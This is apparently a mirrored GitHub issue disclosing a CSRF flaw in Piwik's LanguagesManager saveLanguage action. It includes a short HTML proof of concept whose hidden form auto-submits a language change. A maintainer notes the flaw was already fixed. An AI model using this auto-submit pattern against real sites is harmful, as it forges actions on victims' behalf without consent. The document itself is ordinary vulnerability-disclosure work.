@anonymous-matomo-user opened this Issue on February 6th 2013

The LanguagesManager-Plugin is vulnerable to Cross Site Request Forgery.
The saveLanguage-Function is not checking the token_auth-Variable, nor there is any Protection against CSRF.

A short PoC-Script:
<html><head><title>Piwik CRSF PoC</title> </head> <body> <form name="test" action="http://localhost/index.php?module=LanguagesManager&action=saveLanguage" method="post">
<!--change the URL in action-attribute--> <input type="hidden"
name="language" value='ar'> <!--replace the value with any
possible language file, for example de,en,ar--> </form>
<script>document.test.submit();</script> </body> </html>

@halfdan commented on February 6th 2013 Member

Thanks Merlin, this has already been reported in #3733 and fixed in [c2f670c4a59aa1c4142174365e076ee69a88d105].

This Issue was closed on February 6th 2013
Powered by GitHub Issue Mirror